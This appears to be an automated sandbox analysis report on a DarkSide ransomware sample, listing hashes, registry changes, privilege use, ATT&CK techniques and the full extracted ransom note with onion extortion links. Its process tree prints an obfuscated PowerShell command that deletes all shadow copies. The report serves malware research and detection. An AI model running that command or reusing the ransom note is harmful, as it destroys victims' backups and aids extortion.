darkside | 0f808fd3ecf9d722aafeee46b57aad4d07f39c98be6f6148be979ed470cf0a99

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

max time kernel
136s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
27-01-2024 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Size

59KB
MD5

c830512579b0e08f40bc1791fc10c582
SHA1

2fc8514367d4799d90311b1b1f277b3fca5ca731
SHA256

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975
SHA512

b8e7dc2b26ff00c43dae3e5ceb2b241bc7211c52fba167f1dfd81b285461fd53668953ede798a5f4fd1c587ee9861c2ca0fd034a958428dd3d9f5177c61b5ca3
SSDEEP

768:TTjagICPhDt3bS4nyz2CuwSbV5dNcxGV1ylBpoT6Y23W5o:BpDtG4nMpboDTV1ylXsZ5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\README.95b288ea.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then full dump data. These files include: - finance - private information - partners documents Your personal leak page: http://darksidedxcftmqa.onion/DWMRLAW/N9N6W7_4EpBFAgHXuDGQwpXTQSpdXdKqYN_rPUXHIsXGkuZCNNHvRC8amaoegEAh On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/WKWM6ZXNBVAFW62I1RTLLD4A82OO2O7NBOKLF05CRB4BD06IRBQ0MFA9ZFAKDZH2 When you open our website, put the following data in the input form: Key: LLMNoy1cxUU5F3v2Zv7YhAQxOzdaQF3sOKD9aqFmUCkPeGBCvfM2DiV1zVX7HtYMs8QFQS4jxs4WPZiBVqJwAF5F0pA5SABPG1siAW3c69erGlmUdjURFkmncQQ2FLnzvc3AK1BCuDaxVO2DVr6X5itNLmAtbEKwlUGvyl1oYoSzeIrHqYHTZ5lhhHjuT2UaWJuCJv6wQuEJsolQ2aAZtiM7PZh7AKUR4DdKRaRe3TMOUrm2xnvQ3pZXFRuMTewibx6wmtxLJjTqxJ1Yr5hiJ4uhkOUrni5SxDvlt0bC5dk4eQtIDP2xICeMOYjrLCPpC2hk0JTpp8azhIUZbjy9fXBg0mhuGNufnTPYXtE4RYKCOb7ZphasVglR8j0Mo4JGTRiff1BB9DjCClsf1S9RS6vAtHlLudqyyhmWwURQeS4JSNlZTjOUJUUzvM3S8LXnNAqoX5qtLMXUjiYuMuDwnFQPcvTgK0j8ewGtxNI63ObxyvvVV4Ya4ALZNqA3tO76TcjrW294C3yZcEfFLvv9JUJ0jnDtNEPNGyN1wQUPkTeNZ1Z0LVa5MRP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/DWMRLAW/N9N6W7_4EpBFAgHXuDGQwpXTQSpdXdKqYN_rPUXHIsXGkuZCNNHvRC8amaoegEAh

http://darksidfqzcuhtk2.onion/WKWM6ZXNBVAFW62I1RTLLD4A82OO2O7NBOKLF05CRB4BD06IRBQ0MFA9ZFAKDZH2

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\95b288ea.BMP"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\95b288ea.BMP"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\WallpaperStyle = "10"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Modifies registry class 5 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea\DefaultIcon	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\95b288ea\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\95b288ea.ico"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.95b288ea	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.95b288ea\ = "95b288ea"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

pid	process
3776	powershell.exe
3776	powershell.exe
3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSecurityPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeTakeOwnershipPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeLoadDriverPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemProfilePrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemtimePrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeProfSingleProcessPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeIncBasePriorityPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeCreatePagefilePrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeBackupPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeRestorePrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeShutdownPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeDebugPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemEnvironmentPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeRemoteShutdownPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeUndockPrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeManageVolumePrivilege	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 33	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 34	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 35	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 36	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeBackupPrivilege	4532	vssvc.exe
Token: SeRestorePrivilege	4532	vssvc.exe
Token: SeAuditPrivilege	4532	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	pid	process	target process
PID 3668 wrote to memory of 3776	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe
PID 3668 wrote to memory of 3776	3668	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
"C:\Users\Admin\AppData\Local\Temp\12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4532

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
903d0767f0343beb5dcbb459f778ca12

SHA1
a5b75334350762849f853a9f398e39212e3eeb51

SHA256
d8094f72fbfaaa573a1dba477787f3c0fbd97ad41f3c1c343b79272920bef8c9

SHA512
d1d6fdbcad871ce619cd9e22c844f18f6291fd69a31bc9b8c8ed9d4553d508e4aabfe3d86f6c5433309d510305659ba5783e01c5389291e994b42498cc0ed707

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nbirlc4f.akx.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\README.95b288ea.TXT
Filesize
2KB

MD5
86ed12570f541fd2bf8ae4fa9aff91cb

SHA1
c6ee9fc8ffa7ef75ae8d47121acc9a6ddda61cf5

SHA256
50bd4749aad523d02ef33e49aaea309acba5ac9f4ea0719d3f6d26185993f01d

SHA512
146dc076237f2b9c1fff0d144dbc18a162c94bc42daef9bed35eeccd15468ae64c7dcacdc6f12bda63c5abb2e167edf286429d77a3e19828159f66731ddb37b0

Download Submit
memory/3776-18-0x000002752B000000-0x000002752B010000-memory.dmp

Filesize
64KB

Download
memory/3776-17-0x00007FF912800000-0x00007FF9132C1000-memory.dmp

Filesize
10.8MB

Download
memory/3776-19-0x000002752B000000-0x000002752B010000-memory.dmp

Filesize
64KB

Download
memory/3776-7-0x000002752D180000-0x000002752D1A2000-memory.dmp

Filesize
136KB

Download
memory/3776-22-0x00007FF912800000-0x00007FF9132C1000-memory.dmp

Filesize
10.8MB

Download